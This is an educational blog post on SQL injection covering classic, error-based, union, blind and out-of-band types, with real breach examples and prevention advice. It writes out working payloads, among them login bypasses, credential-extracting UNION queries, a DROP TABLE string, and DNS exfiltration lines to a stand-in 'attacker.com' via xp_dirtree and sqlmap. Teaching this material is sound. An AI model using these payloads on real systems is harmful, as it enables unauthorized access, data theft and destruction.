SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It can be used to:
- View data they shouldn’t be able to access
- Modify or delete records
- Execute administrative operations
- Bypass authentication
- In some cases, gain full control over the system
SQLi is still ranked by OWASP in the Top 10 Web Application Security Risks.
🧪 How SQL Injection Works
Applications often take user input (like login fields, search bars, or form entries) and insert it directly into SQL queries. When input isn’t sanitized or validated properly, malicious SQL can manipulate the query.
🧾 Vulnerable Query Example:
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
🔥 Injection Payload:
' OR '1'='1
➡️ Final Query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
Result: Logs in as the first user—no password required.
🧰 Types of SQL Injection
| Type | Description |
|---|---|
| Classic SQLi | Injection directly via input fields |
| Blind SQLi | No visible output; attackers infer via app behavior |
| Boolean-based Blind | Uses TRUE/FALSE conditions to infer results |
| Time-based Blind | Uses SLEEP() or delays to check execution |
| Error-based SQLi | Uses verbose database error messages to gain information |
| Out-of-Band SQLi | Uses DNS or HTTP requests to exfiltrate data via external systems |
1️⃣ Classic SQL Injection (In-Band SQLi)
Most straightforward and visible form where the attacker uses the same communication channel to both inject and retrieve data.
Example Input:
' OR '1'='1
Query Result:
SELECT * FROM users WHERE username = '' OR '1'='1';
Result: Authenticates the attacker without a password.
Real-World Use: Often used in login bypasses, especially in legacy PHP applications.
2️⃣ Error-Based SQL Injection
Uses detailed database error messages to retrieve information like table names, column names, and even data.
Payload Example:
' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
How It Works: The database throws an error when it tries to convert a string into an integer—revealing table names in the error message.
Risks: If verbose error messages are enabled in production, this can expose the full database schema to attackers.
3️⃣ Union-Based SQL Injection
Leverages the UNION SQL operator to combine results from multiple queries into one.
Payload Example:
' UNION SELECT username, password FROM users--
How It Works: Combines the attacker’s query with the original query. Results (e.g., usernames and passwords) are shown in the application’s response.
Used for: Extracting full database contents directly into the web page.
4️⃣ Blind SQL Injection (Boolean-Based)
When an application doesn’t display errors, attackers infer data based on TRUE/FALSE conditions and app behavior.
Payload Example:
' AND 1=1-- (returns normal page)
' AND 1=2-- (returns error or different page)
How It Works: Response time or page differences tell the attacker whether the query was true or false.
Slow but powerful: Can still extract entire databases.
5️⃣ Blind SQL Injection (Time-Based)
Used when there’s no output at all—attackers determine success based on delays triggered in the database.
Payload Example (MySQL):
' OR IF(1=1, SLEEP(5), 0)--
Observation: Page load delay means condition is true.
Common when:
- Responses are uniform (e.g., error pages)
- No visible errors
- Web app is heavily locked down
6️⃣ Out-of-Band SQL Injection (OOB SQLi)
Used when the app’s response is not visible, and delay-based attacks are not effective. It relies on external interactions, like DNS or HTTP requests.
Payload Example (Data exfil via DNS):
' ; EXEC master..xp_dirtree '//attacker.com/data'--
How It Works: The DB makes an outbound connection to the attacker’s server, revealing information.
Powerful but rare: Requires special functions to be enabled (like xp_dirtree, load_file, UTL_HTTP.REQUEST, etc.)
🔎 Comparison Table
| Type | Output Visible | Speed | Stealth | Common Use Case |
|---|---|---|---|---|
| Classic SQLi | ✅ Yes | ⚡ Fast | ❌ No | Login bypass, dump data |
| Error-Based SQLi | ✅ Yes (errors) | ⚡ Fast | ❌ No | Schema discovery |
| Union-Based SQLi | ✅ Yes | ⚡ Fast | ❌ No | Data extraction into webpage |
| Blind Boolean SQLi | ❌ No | 🐢 Slow | ✅ Yes | When errors are hidden |
| Time-Based Blind SQLi | ❌ No | 🐢 Very Slow | ✅ High | When no other channel is available |
| Out-of-Band SQLi | ❌ No (directly) | 🚀 Fast | ✅ High | DNS/HTTP-based data exfiltration |
🧠 Real-World Exploits
1. Heartland Payment Systems (2008)
Over 134 million credit cards stolen due to SQLi in web applications connected to their payment infrastructure.
2. Yahoo Voices (2012)
Over 450,000 user credentials leaked using a union-based SQLi attack on a subdomain.
3. TalkTalk Telecom (UK) (2015)
Attackers used a simple SQL injection to access customer records and payment details. Resulted in £400,000 fine.
🔎 Detection Techniques
🔧 Manual Testing
- Use payloads like:
' OR '1'='1, admin' --, '; DROP TABLE users; -- - Look for error messages or behavioral changes
🧪 Tools for Detection
- sqlmap – automated SQLi testing and exploitation
- Burp Suite – manual testing with payload tampering
- Netsparker / Acunetix – commercial scanners with SQLi detection
🛡️ Prevention and Mitigation
✅ 1. Use Prepared Statements (Parameterized Queries)
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))
✅ 2. Input Validation & Escaping
- Whitelist expected values
- Reject unexpected characters or SQL syntax
✅ 3. Least Privilege Access
- Database users should not have
DROP, DELETE, or ALTERprivileges unless needed
✅ 4. Web Application Firewall (WAF)
- Tools like ModSecurity, Cloudflare, or AWS WAF can block common payloads
✅ 5. Disable Detailed Errors in Production
- Prevents leaking SQL syntax or table names
🧠 Advanced Exploitation
🔐 Extracting Data (UNION-based SQLi)
' UNION SELECT username, password FROM users --
🕵️ Time-Based Blind SQLi (PostgreSQL)
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END --
📤 Out-of-Band with DNS Exfiltration (using sqlmap)
sqlmap -u "http://target.com/search?q=test" --dns-domain=attacker.com --dbs
🔗 External Resources
🔄 Related HackerVault Posts
- 🔍 Web Security 101: How Websites Get Hacked
- 🧪 Malware Analysis 101: Inside Malicious Code
- 🛡️ Wazuh SIEM: Real-Time Threat Monitoring
🧩 Conclusion
SQL Injection is old—but far from obsolete. With a combination of insecure development practices and poor validation, it remains one of the most common and dangerous vulnerabilities in the wild. Mastering SQLi is essential for both ethical hackers and defenders alike.
